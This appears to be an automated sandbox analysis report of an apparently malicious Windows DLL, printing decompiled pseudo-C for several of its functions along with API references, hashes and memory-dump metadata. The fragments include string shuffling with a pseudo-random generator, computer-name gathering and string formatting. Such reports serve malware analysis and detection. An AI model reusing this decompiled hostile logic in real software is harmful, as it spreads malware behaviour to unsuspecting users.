                                                          • Opcode ID: e9d3482daf5f16dd04da7e43a8ee35d99b39e3069d6313bfcbae88328c9f27d6
                                                          • Instruction ID: 7c1e8ef3aaa1cf482f21a47acd1707ad3daa263c0c9c338ddf7e8323d764157a
                                                          • Opcode Fuzzy Hash: e9d3482daf5f16dd04da7e43a8ee35d99b39e3069d6313bfcbae88328c9f27d6
                                                          • Instruction Fuzzy Hash: 0E51D971A00218BBEB25AFA4DC48F6E77A8EF04754F04889AE603D7640F678FD458B94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 22%
                                                          			E046762DA(signed int __eax, signed int _a4, signed int _a8) {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				intOrPtr _v16;
                                                          				signed int _v20;
                                                          				intOrPtr _t81;
                                                          				char _t83;
                                                          				signed int _t90;
                                                          				signed int _t97;
                                                          				signed int _t99;
                                                          				char _t101;
                                                          				unsigned int _t102;
                                                          				intOrPtr _t103;
                                                          				char* _t107;
                                                          				signed int _t110;
                                                          				signed int _t113;
                                                          				signed int _t118;
                                                          				signed int _t122;
                                                          				intOrPtr _t124;
                                                          
                                                          				_t102 = _a8;
                                                          				_t118 = 0;
                                                          				_v20 = __eax;
                                                          				_t122 = (_t102 >> 2) + 1;
                                                          				_v8 = 0;
                                                          				_a8 = 0;
                                                          				_t81 = E0467A71F(_t122 << 2);
                                                          				_v16 = _t81;
                                                          				if(_t81 == 0) {
                                                          					_push(8);
                                                          					_pop(0);
                                                          					L37:
                                                          					return 0;
                                                          				}
                                                          				_t107 = _a4;
                                                          				_a4 = _t102;
                                                          				_t113 = 0;
                                                          				while(1) {
                                                          					_t83 =  *_t107;
                                                          					if(_t83 == 0) {
                                                          						break;
                                                          					}
                                                          					if(_t83 == 0xd || _t83 == 0xa) {
                                                          						if(_t118 != 0) {
                                                          							if(_t118 > _v8) {
                                                          								_v8 = _t118;
                                                          							}
                                                          							_a8 = _a8 + 1;
                                                          							_t118 = 0;
                                                          						}
                                                          						 *_t107 = 0;
                                                          						goto L16;
                                                          					} else {
                                                          						if(_t118 != 0) {
                                                          							L10:
                                                          							_t118 = _t118 + 1;
                                                          							L16:
                                                          							_t107 = _t107 + 1;
                                                          							_t15 =  &_a4;
                                                          							 *_t15 = _a4 - 1;
                                                          							if( *_t15 != 0) {
                                                          								continue;
                                                          							}
                                                          							break;
                                                          						}
                                                          						if(_t113 == _t122) {
                                                          							L21:
                                                          							if(_a8 <= 0x20) {
                                                          								_push(0xb);
                                                          								L34:
                                                          								_pop(0);
                                                          								L35:
                                                          								E0467A734(_v16);
                                                          								goto L37;
                                                          							}
                                                          							_t24 = _v8 + 5; // 0xcdd8d2f8
                                                          							_t103 = E0467A71F((_v8 + _t24) * _a8 + 4);
                                                          							if(_t103 == 0) {
                                                          								_push(8);
                                                          								goto L34;
                                                          							}
                                                          							_t90 = _a8;
                                                          							_a4 = _a4 & 0x00000000;
                                                          							_v8 = _v8 & 0x00000000;
                                                          							_t124 = _t103 + _t90 * 4;
                                                          							if(_t90 <= 0) {
                                                          								L31:
                                                          								 *0x467d278 = _t103;
                                                          								goto L35;
                                                          							}
                                                          							do {
                                                          								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                                                          								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                                                          								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                                                          								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                                                          								_v12 = _v12 & 0x00000000;
                                                          								if(_a4 <= 0) {
                                                          									goto L30;
                                                          								} else {
                                                          									goto L26;
                                                          								}
                                                          								while(1) {
                                                          									L26:
                                                          									_t99 = _v12;
                                                          									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
                                                          									if(_t99 == 0) {
                                                          										break;
                                                          									}
                                                          									_v12 = _v12 + 1;
                                                          									if(_v12 < _a4) {
                                                          										continue;
                                                          									}
                                                          									goto L30;
                                                          								}
                                                          								_v8 = _v8 - 1;
                                                          								L30:
                                                          								_t97 = _a4;
                                                          								_a4 = _a4 + 1;
                                                          								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                                                          								__imp__(_t124);
                                                          								_v8 = _v8 + 1;
                                                          								_t124 = _t124 + _t97 + 1;
                                                          							} while (_v8 < _a8);
                                                          							goto L31;
                                                          						}
                                                          						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                                                          						_t101 = _t83;
                                                          						if(_t83 - 0x61 <= 0x19) {
                                                          							_t101 = _t101 - 0x20;
                                                          						}
                                                          						 *_t107 = _t101;
                                                          						_t113 = _t113 + 1;
                                                          						goto L10;
                                                          					}
                                                          				}
                                                          				if(_t118 != 0) {
                                                          					if(_t118 > _v8) {
                                                          						_v8 = _t118;
                                                          					}
                                                          					_a8 = _a8 + 1;
                                                          				}
                                                          				goto L21;
                                                          			}






















                                                          APIs
                                                            • Part of subcall function 0467A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04675595), ref: 0467A72B
                                                          • lstrcpy.KERNEL32(63699BC4,00000020), ref: 046763D7
                                                          • lstrcat.KERNEL32(63699BC4,00000020), ref: 046763EC
                                                          • lstrcmp.KERNEL32(00000000,63699BC4), ref: 04676403
                                                          • lstrlen.KERNEL32(63699BC4), ref: 04676427
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 3214092121-3916222277
                                                          • Opcode ID: 8ba80e415d48e89130909757a71231d42d9df73c3654c916637697e661b7b19b
                                                          • Instruction ID: c2ea83633b300473ee78dfc2ea27c075720ac74af40f3257609f5b91abfb02d6
                                                          • Opcode Fuzzy Hash: 8ba80e415d48e89130909757a71231d42d9df73c3654c916637697e661b7b19b
                                                          • Instruction Fuzzy Hash: A151CF71A00608EBDF25CF99C8846ADBBB6FF51324F14C06AE9159B205E771BA52CB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 78%
                                                          			E04676545(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                                          				intOrPtr _v8;
                                                          				void* _v12;
                                                          				void* _v16;
                                                          				intOrPtr _t26;
                                                          				intOrPtr* _t28;
                                                          				intOrPtr _t31;
                                                          				intOrPtr* _t32;
                                                          				void* _t39;
                                                          				int _t46;
                                                          				intOrPtr* _t47;
                                                          				int _t48;
                                                          
                                                          				_t47 = __eax;
                                                          				_push( &_v12);
                                                          				_push(__eax);
                                                          				_t39 = 0;
                                                          				_t46 = 0; // executed
                                                          				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                                          				_v8 = _t26;
                                                          				if(_t26 < 0) {
                                                          					L13:
                                                          					return _v8;
                                                          				}
                                                          				if(_v12 == 0) {
                                                          					Sleep(0xc8);
                                                          					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                                          				}
                                                          				if(_v8 >= _t39) {
                                                          					_t28 = _v12;
                                                          					if(_t28 != 0) {
                                                          						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                                          						_v8 = _t31;
                                                          						if(_t31 >= 0) {
                                                          							_t46 = lstrlenW(_v16);
                                                          							if(_t46 != 0) {
                                                          								_t46 = _t46 + 1;
                                                          								_t48 = _t46 + _t46;
                                                          								_t39 = E0467A71F(_t48);
                                                          								if(_t39 == 0) {
                                                          									_v8 = 0x8007000e;
                                                          								} else {
                                                          									memcpy(_t39, _v16, _t48);
                                                          								}
                                                          								__imp__#6(_v16);
                                                          							}
                                                          						}
                                                          						_t32 = _v12;
                                                          						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                                          					}
                                                          					 *_a4 = _t39;
                                                          					 *_a8 = _t46 + _t46;
                                                          				}
                                                          				goto L13;
                                                          			}















                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: FreeSleepStringlstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 1198164300-0
                                                          • Opcode ID: 9fc9181dd25e4b3e16b4d7122619a43391321fa84eb7e6c9f389cb94d9d9851f
                                                          • Instruction ID: 1e92f49222948b6408076d920faac1d3c6b90dcf26cda0a2903905e3287d94ae
                                                          • Opcode Fuzzy Hash: 9fc9181dd25e4b3e16b4d7122619a43391321fa84eb7e6c9f389cb94d9d9851f
                                                          • Instruction Fuzzy Hash: E5213D7590060AEFDB11DFA8C98499EBBB8FF58314B2041A9E902E7314FB31EE05DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E04678D14(void* __edx) {
                                                          				void* _v8;
                                                          				int _v12;
                                                          				WCHAR* _v16;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* _t23;
                                                          				intOrPtr _t24;
                                                          				intOrPtr _t32;
                                                          				intOrPtr _t35;
                                                          				intOrPtr _t38;
                                                          				void* _t40;
                                                          				intOrPtr _t42;
                                                          				void* _t45;
                                                          				void* _t50;
                                                          				void* _t52;
                                                          
                                                          				_t50 = __edx;
                                                          				_v12 = 0;
                                                          				_t23 = E0467A2F9(0,  &_v8); // executed
                                                          				if(_t23 != 0) {
                                                          					_v8 = 0;
                                                          				}
                                                          				_t24 =  *0x467d2a8; // 0x47a5a8
                                                          				_t4 = _t24 + 0x467edc0; // 0x4af9368
                                                          				_t5 = _t24 + 0x467ed68; // 0x4f0053
                                                          				_t45 = E04675356( &_v16, _v8, _t5, _t4);
                                                          				if(_t45 == 0) {
                                                          					StrToIntExW(_v16, 0,  &_v12);
                                                          					_t45 = 8;
                                                          					if(_v12 < _t45) {
                                                          						_t45 = 1;
                                                          						__eflags = 1;
                                                          					} else {
                                                          						_t32 =  *0x467d2a8; // 0x47a5a8
                                                          						_t11 = _t32 + 0x467edb4; // 0x4af935c
                                                          						_t48 = _t11;
                                                          						_t12 = _t32 + 0x467ed68; // 0x4f0053
                                                          						_t52 = E046745C6(_t11, _t12, _t11);
                                                          						_t59 = _t52;
                                                          						if(_t52 != 0) {
                                                          							_t35 =  *0x467d2a8; // 0x47a5a8
                                                          							_t13 = _t35 + 0x467edfe; // 0x30314549
                                                          							if(E04678E27(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
                                                          								_t61 =  *0x467d25c - 6;
                                                          								if( *0x467d25c <= 6) {
                                                          									_t42 =  *0x467d2a8; // 0x47a5a8
                                                          									_t15 = _t42 + 0x467ec0a; // 0x52384549
                                                          									E04678E27(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                                                          								}
                                                          							}
                                                          							_t38 =  *0x467d2a8; // 0x47a5a8
                                                          							_t17 = _t38 + 0x467edf8; // 0x4af93a0
                                                          							_t18 = _t38 + 0x467edd0; // 0x680043
                                                          							_t40 = E04675D7D(_v8, 0x80000001, _t52, _t18, _t17); // executed
                                                          							_t45 = _t40;
                                                          							HeapFree( *0x467d238, 0, _t52);
                                                          						}
                                                          					}
                                                          					HeapFree( *0x467d238, 0, _v16);
                                                          				}
                                                          				_t54 = _v8;
                                                          				if(_v8 != 0) {
                                                          					E04674F14(_t54);
                                                          				}
                                                          				return _t45;
                                                          			}

                                                          APIs
                                                          • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04AF9368,00000000,?,74B5F710,00000000,74B5F730), ref: 04678D63
                                                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04AF93A0,?,00000000,30314549,00000014,004F0053,04AF935C), ref: 04678E00
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,0467523E), ref: 04678E12
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: 04f9b21fbb20aa656264ebc734405bea4db848f28bb146fe94c0b6952d88bfa1
                                                          • Instruction ID: e2c6effa2d71a9f44096182ddab684fe7cd101bec532124647324b2b08e81121
                                                          • Opcode Fuzzy Hash: 04f9b21fbb20aa656264ebc734405bea4db848f28bb146fe94c0b6952d88bfa1
                                                          • Instruction Fuzzy Hash: 4331C271910109BFEB10EB90DC48E9E7BBDEF44708F1445AAB6109B220FB71AE49CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 53%
                                                          			E0467A376(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                          				void* _v8;
                                                          				void* __edi;
                                                          				intOrPtr _t18;
                                                          				void* _t24;
                                                          				void* _t25;
                                                          				void* _t30;
                                                          				void* _t36;
                                                          				void* _t40;
                                                          				intOrPtr _t42;
                                                          
                                                          				_t36 = __edx;
                                                          				_t32 = __ecx;
                                                          				_push(__ecx);
                                                          				_push(__ecx);
                                                          				_t42 =  *0x467d340; // 0x4af9a88
                                                          				_push(0x800);
                                                          				_push(0);
                                                          				_push( *0x467d238);
                                                          				if( *0x467d24c >= 5) {
                                                          					if(RtlAllocateHeap() == 0) {
                                                          						L6:
                                                          						_t30 = 8;
                                                          						L7:
                                                          						if(_t30 != 0) {
                                                          							L10:
                                                          							 *0x467d24c =  *0x467d24c + 1;
                                                          							L11:
                                                          							return _t30;
                                                          						}
                                                          						_t44 = _a4;
                                                          						_t40 = _v8;
                                                          						 *_a16 = _a4;
                                                          						 *_a20 = E04677306(_t44, _t40);
                                                          						_t18 = E04674A09(_t40, _t44);
                                                          						if(_t18 != 0) {
                                                          							 *_a8 = _t40;
                                                          							 *_a12 = _t18;
                                                          							if( *0x467d24c < 5) {
                                                          								 *0x467d24c =  *0x467d24c & 0x00000000;
                                                          							}
                                                          							goto L11;
                                                          						}
                                                          						_t30 = 0xbf;
                                                          						E04676761();
                                                          						RtlFreeHeap( *0x467d238, 0, _t40); // executed
                                                          						goto L10;
                                                          					}
                                                          					_t24 = E04671F13(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
                                                          					L5:
                                                          					_t30 = _t24;
                                                          					goto L7;
                                                          				}
                                                          				_t25 = RtlAllocateHeap(); // executed
                                                          				if(_t25 == 0) {
                                                          					goto L6;
                                                          				}
                                                          				_t24 = E04674AB6(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25); // executed
                                                          				goto L5;
                                                          			}

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800,74B5F710), ref: 0467A39A
                                                            • Part of subcall function 04674AB6: GetTickCount.KERNEL32 ref: 04674ACA
                                                            • Part of subcall function 04674AB6: wsprintfA.USER32 ref: 04674B1A
                                                            • Part of subcall function 04674AB6: wsprintfA.USER32 ref: 04674B37
                                                            • Part of subcall function 04674AB6: wsprintfA.USER32 ref: 04674B63
                                                            • Part of subcall function 04674AB6: HeapFree.KERNEL32(00000000,?), ref: 04674B75
                                                            • Part of subcall function 04674AB6: wsprintfA.USER32 ref: 04674B96
                                                            • Part of subcall function 04674AB6: HeapFree.KERNEL32(00000000,?), ref: 04674BA6
                                                            • Part of subcall function 04674AB6: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04674BD4
                                                            • Part of subcall function 04674AB6: GetTickCount.KERNEL32 ref: 04674BE5
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800,74B5F710), ref: 0467A3B8
                                                          • RtlFreeHeap.NTDLL(00000000,00000002,04675289,?,04675289,00000002,?,?,04675D5E,?), ref: 0467A415
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Heap$wsprintf$AllocateFree$CountTick
                                                          • String ID:
                                                          • API String ID: 1676223858-0
                                                          • Opcode ID: a073f00c08e448570e193d837648014d181b1c84bb0b12fc56559f0de5dfd7a9
                                                          • Instruction ID: 609fbd67a5f7ae127d510c0ebaf5166dd896ceae1fb54129f38b04b143899883
                                                          • Opcode Fuzzy Hash: a073f00c08e448570e193d837648014d181b1c84bb0b12fc56559f0de5dfd7a9
                                                          • Instruction Fuzzy Hash: 40213772210204EBEB15DF98D884AAE37ACEF49355F10442AFA01DB250FB75AD42DBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 75%
                                                          			E0467219B(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                                          				void* _v8;
                                                          				void* __esi;
                                                          				intOrPtr* _t35;
                                                          				intOrPtr* _t41;
                                                          				intOrPtr* _t43;
                                                          				intOrPtr* _t45;
                                                          				intOrPtr* _t50;
                                                          				intOrPtr* _t52;
                                                          				void* _t54;
                                                          				intOrPtr* _t55;
                                                          				intOrPtr* _t57;
                                                          				intOrPtr* _t61;
                                                          				intOrPtr* _t65;
                                                          				intOrPtr _t68;
                                                          				void* _t72;
                                                          				void* _t75;
                                                          				void* _t76;
                                                          
                                                          				_t55 = _a4;
                                                          				_t35 =  *((intOrPtr*)(_t55 + 4));
                                                          				_a4 = 0;
                                                          				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                                          				if(_t76 < 0) {
                                                          					L18:
                                                          					return _t76;
                                                          				}
                                                          				_t76 = E04673AB0(_v8, _a8, _a12, _a20,  &_a20,  &_a12);
                                                          				if(_t76 >= 0) {
                                                          					_t61 = _a28;
                                                          					if(_t61 != 0 &&  *_t61 != 0) {
                                                          						_t52 = _v8;
                                                          						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                                          					}
                                                          					if(_t76 >= 0) {
                                                          						_t43 =  *_t55;
                                                          						_t68 =  *0x467d2a8; // 0x47a5a8
                                                          						_t20 = _t68 + 0x467e1fc; // 0x740053
                                                          						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                                          						if(_t76 >= 0) {
                                                          							_t76 = E046757B4(_a4);
                                                          							if(_t76 >= 0) {
                                                          								_t65 = _a28;
                                                          								if(_t65 != 0 &&  *_t65 == 0) {
                                                          									_t50 = _a4;
                                                          									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                                          								}
                                                          							}
                                                          						}
                                                          						_t45 = _a4;
                                                          						if(_t45 != 0) {
                                                          							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                                          						}
                                                          						_t57 = __imp__#6;
                                                          						if(_a20 != 0) {
                                                          							 *_t57(_a20);
                                                          						}
                                                          						if(_a12 != 0) {
                                                          							 *_t57(_a12);
                                                          						}
                                                          					}
                                                          				}
                                                          				_t41 = _v8;
                                                          				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                                          				goto L18;
                                                          			}

                                                          APIs
                                                            • Part of subcall function 04673AB0: SysAllocString.OLEAUT32(80000002), ref: 04673B0D
                                                            • Part of subcall function 04673AB0: SysFreeString.OLEAUT32(00000000), ref: 04673B73
                                                          • SysFreeString.OLEAUT32(?), ref: 0467227A
                                                          • SysFreeString.OLEAUT32(046785ED), ref: 04672284
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: String$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 986138563-0
                                                          • Opcode ID: 7cf4b60f59618ef84ab7b7b0eeadd578464ec55b1c92959f8b6434592396d285
                                                          • Instruction ID: 819cb0cdd6e32687ad38f6651ba1c8b3786c00ac4e31cff97654c27a0625b75e
                                                          • Opcode Fuzzy Hash: 7cf4b60f59618ef84ab7b7b0eeadd578464ec55b1c92959f8b6434592396d285
                                                          • Instruction Fuzzy Hash: E2317E71500119EFCB11EF94C898CABBB7AFFC97407104A98F9259B214E731ED91CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SysAllocString.OLEAUT32(0467A513), ref: 04676220
                                                            • Part of subcall function 0467219B: SysFreeString.OLEAUT32(?), ref: 0467227A
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04676261
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: String$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 986138563-0
                                                          • Opcode ID: c2a579feade5bcd7cc1ab4296f9c0a7ab03141935f18a32e33404ebf89274135
                                                          • Instruction ID: fa11c161ef593caaf193bc90d1be66d9a1873cd98ad24048395cef67c12e7520
                                                          • Opcode Fuzzy Hash: c2a579feade5bcd7cc1ab4296f9c0a7ab03141935f18a32e33404ebf89274135
                                                          • Instruction Fuzzy Hash: C5014B3651010ABFDB419FA8D804DAB7BB9EF48614B104066FA08E6220F6319E158BA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 37%
                                                          			E046758DB(void* __ecx) {
                                                          				signed int _v8;
                                                          				void* _t15;
                                                          				void* _t19;
                                                          				void* _t20;
                                                          				void* _t22;
                                                          				intOrPtr* _t23;
                                                          
                                                          				_t23 = __imp__;
                                                          				_t20 = 0;
                                                          				_v8 = _v8 & 0;
                                                          				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                                          				_t10 = _v8;
                                                          				if(_v8 != 0) {
                                                          					_t20 = E0467A71F(_t10 + 1);
                                                          					if(_t20 != 0) {
                                                          						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                                          						if(_t15 != 0) {
                                                          							 *((char*)(_v8 + _t20)) = 0;
                                                          						} else {
                                                          							E0467A734(_t20);
                                                          							_t20 = 0;
                                                          						}
                                                          					}
                                                          				}
                                                          				return _t20;
                                                          			}










                                                          APIs
                                                          • GetComputerNameExA.KERNELBASE(00000003,00000000,04671FA0,74B5F710,00000000,?,?,04671FA0), ref: 046758F3
                                                            • Part of subcall function 0467A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04675595), ref: 0467A72B
                                                          • GetComputerNameExA.KERNELBASE(00000003,00000000,04671FA0,04671FA1,?,?,04671FA0), ref: 04675910
                                                            • Part of subcall function 0467A734: HeapFree.KERNEL32(00000000,00000000,04675637,00000000,?,?,00000000), ref: 0467A740
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: ComputerHeapName$AllocateFree
                                                          • String ID:
                                                          • API String ID: 187446995-0
                                                          • Opcode ID: 8255951fb48d604882ac42a78608785b9ca83fac7b90c8c45ff71104775bf486
                                                          • Instruction ID: dec8fcf8da11312fd6ad08181bb7f754831d400e81df9f130ce832c22fd26c9a
                                                          • Opcode Fuzzy Hash: 8255951fb48d604882ac42a78608785b9ca83fac7b90c8c45ff71104775bf486
                                                          • Instruction Fuzzy Hash: 93F05436600145BAEB11D7A98C01EAF76FDDBC5654F250099A505E3241FA70EE019770
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                          				intOrPtr _t4;
                                                          				void* _t10;
                                                          				void* _t11;
                                                          				void* _t12;
                                                          				void* _t14;
                                                          
                                                          				_t14 = 1;
                                                          				_t4 = _a8;
                                                          				if(_t4 == 0) {
                                                          					if(InterlockedDecrement(0x467d23c) == 0) {
                                                          						E04671B42();
                                                          					}
                                                          				} else {
                                                          					if(_t4 == 1 && InterlockedIncrement(0x467d23c) == 1) {
                                                          						_t10 = E046712E5(_t11, _t12, _a4); // executed
                                                          						if(_t10 != 0) {
                                                          							_t14 = 0;
                                                          						}
                                                          					}
                                                          				}
                                                          				return _t14;
                                                          			}









                                                          APIs
                                                          • InterlockedIncrement.KERNEL32(0467D23C), ref: 04674EDF
                                                            • Part of subcall function 046712E5: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,04674EF2,?), ref: 046712F8
                                                          • InterlockedDecrement.KERNEL32(0467D23C), ref: 04674EFF
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Interlocked$CreateDecrementHeapIncrement
                                                          • String ID:
                                                          • API String ID: 3834848776-0
                                                          • Opcode ID: 4c85086cc923fa27e6a7e17f275a843983c6fcf07f83d13222bb9ea54d5d0aaf
                                                          • Instruction ID: db1629f6511a3e3dda3e1bb1079db6b3b9df5bc9dc510c86ff5e49150eb5f10f
                                                          • Opcode Fuzzy Hash: 4c85086cc923fa27e6a7e17f275a843983c6fcf07f83d13222bb9ea54d5d0aaf
                                                          • Instruction Fuzzy Hash: C9E0863132813953E7211EB4990CB5EA652EFD1B84F014415F681D1230FE18F84196D9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 88%
                                                          			E04671AE2(intOrPtr* __edi) {
                                                          				intOrPtr _v8;
                                                          				char _v12;
                                                          				intOrPtr _v16;
                                                          				intOrPtr _t15;
                                                          				intOrPtr* _t21;
                                                          
                                                          				_t21 = __edi;
                                                          				_push( &_v12);
                                                          				_push(__edi);
                                                          				_v8 = 0x1d4c0;
                                                          				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
                                                          				while(1) {
                                                          					_v16 = _t15;
                                                          					Sleep(0x1f4); // executed
                                                          					if(_v12 == 4) {
                                                          						break;
                                                          					}
                                                          					if(_v8 == 0) {
                                                          						L4:
                                                          						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
                                                          						continue;
                                                          					} else {
                                                          						if(_v8 <= 0x1f4) {
                                                          							_v16 = 0x80004004;
                                                          						} else {
                                                          							_v8 = _v8 - 0x1f4;
                                                          							goto L4;
                                                          						}
                                                          					}
                                                          					L8:
                                                          					return _v16;
                                                          				}
                                                          				goto L8;
                                                          			}









                                                          APIs
                                                          • Sleep.KERNELBASE(000001F4), ref: 04671B2A
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
